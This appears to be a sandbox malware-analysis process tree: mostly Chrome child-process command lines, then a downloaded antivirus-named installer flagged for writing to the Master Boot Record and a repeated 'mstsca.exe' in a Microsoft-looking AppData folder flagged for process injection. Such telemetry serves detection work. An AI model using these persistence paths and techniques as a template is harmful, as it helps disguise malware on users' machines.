C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2836 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5812 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5852 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5212 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4132 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5364 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4144 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=888 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=972 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3104 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1600 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5380 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5644 /prefetch:82⤵
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SwReporter\104.288.200\software_reporter_tool.exe"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SwReporter\104.288.200\software_reporter_tool.exe" --engine=2 --scan-locations=1,2,3,4,5,6,7,8,10 --disabled-locations=9,11 --session-id=bT92GmuFwz+CeixYWRCTdwIPuPA00dhnw/p6lJiK --registry-suffix=ESET --enable-crash-reporting --srt-field-trial-group-name=Off2⤵
- Enumerates VirtualBox registry keys
-
\??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\104.288.200\software_reporter_tool.exe"c:\users\admin\appdata\local\google\chrome\user data\swreporter\104.288.200\software_reporter_tool.exe" --crash-handler "--database=c:\users\admin\appdata\local\Google\Software Reporter Tool" --url=https://clients2.google.com/cr/report --annotation=plat=Win32 --annotation=prod=ChromeFoil --annotation=ver=104.288.200 --initial-client-data=0x2a0,0x2a4,0x2a8,0x27c,0x2ac,0x7ff7fd9f2d20,0x7ff7fd9f2d30,0x7ff7fd9f2d403⤵
-
\??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\104.288.200\software_reporter_tool.exe"c:\users\admin\appdata\local\google\chrome\user data\swreporter\104.288.200\software_reporter_tool.exe" --enable-crash-reporting --use-crash-handler-with-id="\\.\pipe\crashpad_41176_XREIPQVFQZXPCWEC" --sandboxed-process-id=2 --init-done-notifier=796 --sandbox-mojo-pipe-token=1794225446323783133 --mojo-platform-channel-handle=772 --engine=23⤵
- Enumerates VirtualBox registry keys
- Loads dropped DLL
-
\??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\104.288.200\software_reporter_tool.exe"c:\users\admin\appdata\local\google\chrome\user data\swreporter\104.288.200\software_reporter_tool.exe" --enable-crash-reporting --use-crash-handler-with-id="\\.\pipe\crashpad_41176_XREIPQVFQZXPCWEC" --sandboxed-process-id=3 --init-done-notifier=1032 --sandbox-mojo-pipe-token=13250761345822872391 --mojo-platform-channel-handle=10283⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3868 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4900 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2672 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=888 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5436 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5216 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2292 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6048 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2964 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1632 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5824 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3056 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4136 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5832 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3948 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5652 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3056 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5880 /prefetch:22⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1624 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4120 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5292 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3912 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5424 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5948 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4136 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6280 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5808 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=75 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3104 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3056 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=77 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5788 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=84 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6384 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=83 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6376 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=85 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6560 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=86 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6696 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=87 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6792 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=82 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6020 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=81 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3836 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=80 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5688 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=78 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6244 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=88 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3060 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=89 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6664 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=90 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=968 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=91 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6536 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6172 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6308 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6544 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7044 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5852 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5964 /prefetch:82⤵
-
C:\Users\Admin\Downloads\kav21.3.10.391en_26075.exe"C:\Users\Admin\Downloads\kav21.3.10.391en_26075.exe"2⤵
- Loads dropped DLL
- Checks for any installed AV software in registry
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Drops file in Windows directory
- Modifies system certificate store
-
C:\Users\Admin\AppData\Local\Temp\43F97DAE-32D9-11ED-89AC-E62D9FD3CB0B\TEST_WPF.EXE"C:\Users\Admin\AppData\Local\Temp\43F97DAE-32D9-11ED-89AC-E62D9FD3CB0B\TEST_WPF.EXE" "C:\Users\Admin\AppData\Local\Temp\CAD79F349D23DE1198CA6ED2F93DBCB0\setup.dll"3⤵
- Loads dropped DLL
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
C:\Program Files\Google\Chrome\Application\89.0.4389.114\elevation_service.exe"C:\Program Files\Google\Chrome\Application\89.0.4389.114\elevation_service.exe"1⤵
- Drops file in Program Files directory
-
C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir42212_473247478\ChromeRecovery.exe"C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir42212_473247478\ChromeRecovery.exe" --appguid={8A69D345-D564-463c-AFF1-A69D9E530F96} --browser-version=89.0.4389.114 --sessionid={53e66dc9-c21d-44be-9210-d55306dabd41} --system2⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /71⤵
- Enumerates VirtualBox registry keys
- Checks SCSI registry key(s)
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Checks for any installed AV software in registry
- Enumerates connected drives
- Drops file in Windows directory
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 0F69EBF3B38EE29A85030884C6C4D1142⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 9F7AE221EA457731767459D88AEA7494 E Global\MSI00002⤵
-
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding B664845B6EB90852ABF195479A8BFBAB E Global\MSI00002⤵
- Drops file in Drivers directory
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
C:\Users\Admin\AppData\Roaming\ddefwhhC:\Users\Admin\AppData\Roaming\ddefwhh1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 46916 -s 3122⤵
- Program crash
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
